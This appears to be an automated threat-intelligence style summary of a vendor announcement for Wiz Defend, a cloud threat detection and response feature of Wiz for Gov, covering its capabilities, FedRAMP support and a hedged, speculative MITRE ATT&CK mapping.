Full Report
Wiz Defend is now part of Wiz for Gov, giving public sector teams cloud runtime threat detection with full context to accelerate detection, investigation, and remediation of threats with precision.
Analysis Summary
# Tool/Technique: Wiz Defend
## Overview
Wiz Defend is a component of Wiz for Gov, designed to modernize cloud threat detection, investigation, and response for government teams and organizations with FedRAMP requirements. Its primary goal is to filter out alert noise, surface root causes quickly, and provide context to understand the blast radius and impact of threats in complex cloud environments.
## Technical Details
- Type: Tool/Platform Feature (Cloud Threat Detection and Response)
- Platform: Cloud environments (likely covering AWS, Azure, GCP, etc., given the context of cloud-native threats)
- Capabilities: Ingests and analyzes external logs, filters noise/duplicates, groups connected events into high-fidelity threats, correlates signals across cloud control plane, identity, data, workload runtime, and network layers to generate unified attack storylines.
- First Seen: Not explicitly mentioned, but announced as part of Wiz for Gov's general availability offering in the context of the article.
## MITRE ATT&CK Mapping
The article mentions that threat detection is aligned to TTPs, implying coverage across cloud-native attack matrices, but does not list specific T### mappings within the provided text. It generally aims to detect techniques used in **Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, and Impact** within cloud environments.
A likely general mapping for advanced detection capabilities would fall under:
- TA0011 - Command and Control
- TA0008 - Lateral Movement
- Tactic related to **Detection and Response** (e.g., Detection Layer functionalities often map to broader detection categories).
## Functionality
### Core Capabilities
- **Noise Reduction:** Continuously ingests telemetry, suppresses false positives, and groups related events to provide high-fidelity detections.
- **Contextual Correlation:** Analyzes signals across Infrastructure, Identity, Data, Workload Runtime, and Control Plane layers.
- **Accelerated Investigation:** Creates visual attack storylines connecting events across layers (identity, runtime, network, resources, control plane) to trace attacker movement and determine root cause rapidly, aiming to reduce MTTR from hours to minutes.
### Advanced Features
- **eBPF-based Wiz Sensor:** Provides deep runtime visibility across hosts and containers without requiring privileged access, enabling tracking activity from code to runtime.
- **Code-to-Cloud Tracing:** Connects issues found early in the development lifecycle (e.g., exposed secrets in code) to actual runtime compromises in production (e.g., identity compromise).
- **Automated Response:** Allows response policies to be triggered via the Wiz Sensor for real-time containment (e.g., isolating a workload or alerting SIEM/SOAR).
- **Compliance Support:** Aids in achieving and maintaining FedRAMP compliance by supporting controls like SI-4 and AU-6 through continuous monitoring and evidence generation for cATO.
## Indicators of Compromise
This tool is a defense mechanism focusing on detecting attacker IoCs, not malware distributing them. Therefore, specific offensive IoCs are not provided by the tool's description, although it analyzes them.
- File Hashes: N/A (Defensive Analysis)
- File Names: N/A (Defensive Analysis)
- Registry Keys: N/A (Defensive Analysis)
- Network Indicators: N/A (Defensive Analysis - collects/analyzes external network data but outputs specific threat narratives, not explicit IoCs in this summary)
- Behavioral Indicators: Ingestion and analysis of runtime activity, API calls, identity usage, and workload interactions that constitute cloud-native TTPs.
## Associated Threat Actors
The tool is designed to combat adversaries targeting cloud environments, particularly those utilizing cloud-native TTPs that bypass traditional endpoint detection methods. While specific threat actors are not named as users of the tool in this context, it is aimed at countering sophisticated actors targeting **Federal agencies** and organizations adhering to **FedRAMP** standards.
## Detection Methods
Wiz Defend utilizes:
- **Behavioral Analytics:** To group and identify meaningful security events.
- **Threat Intelligence:** Incorporation of thousands of built-in detections for cloud-specific TTPs and real-time threat intelligence feeds.
- **Signature-based detection:** Through built-in detections mapped to known cloud TTPs.
## Mitigation Strategies
- **Real-time Containment:** Triggering response policies (e.g., workload isolation) based on runtime detections to stop active threats.
- **Root Cause Remediation:** Pinpointing the origin of the threat (e.g., developers fixing infrastructure drift or misconfigurations) to prevent recurrence.
- **Continuous Monitoring:** Utilizing the Wiz Sensor for continuous visibility across runtime environments.
- **Proactive Hardening:** Detecting issues early in the development lifecycle (Wiz Code integration implied) to minimize the attack surface before deployment.
## Related Tools/Techniques
- Wiz for Gov (The overarching platform)
- Wiz Sensor (eBPF-based runtime visibility component)
- Wiz Code (Implied tool for secure software supply chain visibility)